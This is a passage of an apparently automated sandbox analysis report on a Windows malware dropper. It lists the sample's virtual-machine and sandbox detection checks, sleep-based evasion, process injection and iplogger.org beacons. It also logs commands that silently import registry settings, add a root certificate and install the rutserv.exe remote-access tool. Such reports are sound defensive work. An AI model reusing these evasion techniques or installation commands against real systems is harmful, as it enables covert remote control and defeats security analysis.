Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\regedit.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Immunity\rutserv.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.350278531.0000000002CCA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 1wOdXavtlE.exe PID: 6844, type: MEMORY
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Users\user\Desktop\1wOdXavtlE.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\Desktop\1wOdXavtlE.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Query firmware table information (likely to detect VMs)
Source: C:\ProgramData\Immunity\rutserv.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 1wOdXavtlE.exe, 00000000.00000002.350278531.0000000002CCA000.00000004.00000001.sdmp, ssevs.exe, 00000016.00000002.492325113.000000000367A000.00000004.00000001.sdmp, sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: 1wOdXavtlE.exe, 00000000.00000002.350278531.0000000002CCA000.00000004.00000001.sdmp, ssevs.exe, 00000016.00000002.492325113.000000000367A000.00000004.00000001.sdmp, sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Window / User API: threadDelayed 1968
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Window / User API: threadDelayed 6807
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Window / User API: threadDelayed 761
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QEDPC.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-97L06.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Dropped PE file which has not been started: C:\ProgramData\is-PFD3D.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp Dropped PE file which has not been started: C:\ProgramData\Immunity\is-1J28N.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp Dropped PE file which has not been started: C:\ProgramData\Immunity\is-2SOD7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp Dropped PE file which has not been started: C:\ProgramData\Immunity\is-02I40.tmp
Is looking for software installed on the system
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\1wOdXavtlE.exe TID: 6848 Thread sleep time: -31500s >= -30000s
Source: C:\Users\user\Desktop\1wOdXavtlE.exe TID: 6884 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\1wOdXavtlE.exe TID: 6436 Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 660 Thread sleep time: -270000s >= -30000s
Source: C:\Windows\System32\conhost.exe TID: 2268 Thread sleep count: 39 > 30
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe TID: 6440 Thread sleep time: -31500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe TID: 5628 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe TID: 3500 Thread sleep count: 173 > 30
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe TID: 5236 Thread sleep time: -31500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe TID: 5308 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe TID: 956 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\timeout.exe TID: 6768 Thread sleep count: 71 > 30
Source: C:\Windows\System32\svchost.exe TID: 6272 Thread sleep time: -30000s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\Desktop\1wOdXavtlE.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_0040B268 FindFirstFileW,FindClose, 17_2_0040B268
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_0040AC9C GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW, 17_2_0040AC9C
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Code function: 19_2_005E9B24 FindFirstFileW,GetLastError, 19_2_005E9B24
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Code function: 19_2_0040CBFC FindFirstFileW,FindClose, 19_2_0040CBFC
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Code function: 19_2_0040C630 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW, 19_2_0040C630
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Code function: 19_2_00641778 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose, 19_2_00641778
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_004A1628 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery, 17_2_004A1628
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Thread delayed: delay time: 31500
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Thread delayed: delay time: 31500
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Thread delayed: delay time: 31500
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Thread delayed: delay time: 922337203685477
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: svchost.exe, 00000001.00000002.336388011.0000025C3AC70000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.400774600.000001D39DE60000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.419604983.00000229106A0000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.467674864.00000221A4200000.00000002.00000001.sdmp, servs.exe, 00000011.00000002.546809570.00000000022C0000.00000002.00000001.sdmp, servs.tmp, 00000013.00000002.534419633.00000000025E0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp Binary or memory string: vmware
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: svchost.exe, 0000000F.00000002.464247410.00000221A32A5000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: svchost.exe, 00000001.00000002.336388011.0000025C3AC70000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.400774600.000001D39DE60000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.419604983.00000229106A0000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.467674864.00000221A4200000.00000002.00000001.sdmp, servs.exe, 00000011.00000002.546809570.00000000022C0000.00000002.00000001.sdmp, servs.tmp, 00000013.00000002.534419633.00000000025E0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000001.00000002.336388011.0000025C3AC70000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.400774600.000001D39DE60000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.419604983.00000229106A0000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.467674864.00000221A4200000.00000002.00000001.sdmp, servs.exe, 00000011.00000002.546809570.00000000022C0000.00000002.00000001.sdmp, servs.tmp, 00000013.00000002.534419633.00000000025E0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000001.00000002.336388011.0000025C3AC70000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.400774600.000001D39DE60000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.419604983.00000229106A0000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.467674864.00000221A4200000.00000002.00000001.sdmp, servs.exe, 00000011.00000002.546809570.00000000022C0000.00000002.00000001.sdmp, servs.tmp, 00000013.00000002.534419633.00000000025E0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe Code function: 23_2_00007FF7D9F52C98 GetCurrentThreadId,memset,IsDebuggerPresent,OutputDebugStringW, 23_2_00007FF7D9F52C98
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe Code function: 23_2_00007FF7D9F53D48 GetCurrentProcessId,CreateMutexExW,CloseHandle,WaitForSingleObjectEx,ReleaseMutex,WaitForSingleObjectEx,GetLastError,CloseHandle,SetLastError,GetLastError,CloseHandle,SetLastError,GetLastError,ReleaseMutex,SetLastError,GetProcessHeap,HeapFree,ReleaseMutex, 23_2_00007FF7D9F53D48
Enables debug privileges
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process token adjusted: Debug
Source: C:\ProgramData\Immunity\rutserv.exe Process token adjusted: Debug
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe Code function: 23_2_64882991 SetUnhandledExceptionFilter, 23_2_64882991
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe Code function: 23_2_648815C0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort, 23_2_648815C0
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe Code function: 23_2_648891FC GetCurrentProcessId,SetUnhandledExceptionFilter,Sleep, 23_2_648891FC
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe Code function: 23_2_00007FF7D9F54A60 SetUnhandledExceptionFilter, 23_2_00007FF7D9F54A60
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe Code function: 23_2_00007FF7D9F54D88 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 23_2_00007FF7D9F54D88
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

DLL side loading technique detected
Source: C:\Windows\System32\conhost.exe Section loaded: C:\Windows\System32\uxtheme.dll
Source: C:\Windows\regedit.exe Section loaded: C:\Windows\System32\uxtheme.dll
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Memory written: C:\Users\user\AppData\Local\Temp\ssevs.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Memory written: C:\Users\user\AppData\Local\Temp\sssevs.exe base: 400000 value starts with: 4D5A
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Code function: 19_2_0062F168 ShellExecuteExW,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle, 19_2_0062F168
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Process created: C:\Users\user\Desktop\1wOdXavtlE.exe {path}
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://iplogger.org/1tncg7
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://iplogger.org/1tsTg7
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Process created: C:\Users\user\AppData\Local\Temp\servs.exe 'C:\Users\user\AppData\Local\Temp\servs.exe'
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Process created: C:\Users\user\AppData\Local\Temp\ssevs.exe 'C:\Users\user\AppData\Local\Temp\ssevs.exe'
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Process created: C:\Users\user\AppData\Local\Temp\sssevs.exe 'C:\Users\user\AppData\Local\Temp\sssevs.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe C:\Windows \System32\PasswordOnWakeSettingFlyout.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe TIMEOUT /T 8
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Process created: C:\Users\user\AppData\Local\Temp\ssevs.exe {path}
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Process created: C:\Users\user\AppData\Local\Temp\sssevs.exe {path}
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\regedit.exe regedit /s C:\ProgramData\Immunity\ses.reg
Source: C:\Windows\System32\cmd.exe Process created: C:\ProgramData\Immunity\CertMgry\CertMgr.Exe certmgr.exe -add -c Sert.cer -s -r localMachine Root
Source: C:\Windows\System32\cmd.exe Process created: C:\ProgramData\Immunity\rutserv.exe 'rutserv.exe' /silentinstall
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Code function: 19_2_005A502C InitializeSecurityDescriptor,SetSecurityDescriptorDacl, 19_2_005A502C
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Code function: 19_2_005A41D0 AllocateAndInitializeSid,GetVersion,GetModuleHandleW,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid, 19_2_005A41D0

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_00405AC0 cpuid 17_2_00405AC0
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: GetUserDefaultUILanguage,GetLocaleInfoW, 17_2_0040B3B8
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: GetLocaleInfoW, 17_2_0041E154
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: GetLocaleInfoW, 17_2_0041E1A0
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 17_2_0040A840
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: GetLocaleInfoW, 17_2_004A0F2C
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Code function: GetUserDefaultUILanguage,GetLocaleInfoW, 19_2_0040CD4C
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 19_2_0040C1D4
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Code function: GetLocaleInfoW, 19_2_005ED8D0
Queries the installation date of Windows
Source: C:\ProgramData\Immunity\rutserv.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the product ID of Windows
Source: C:\ProgramData\Immunity\rutserv.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Users\user\Desktop\1wOdXavtlE.exe VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
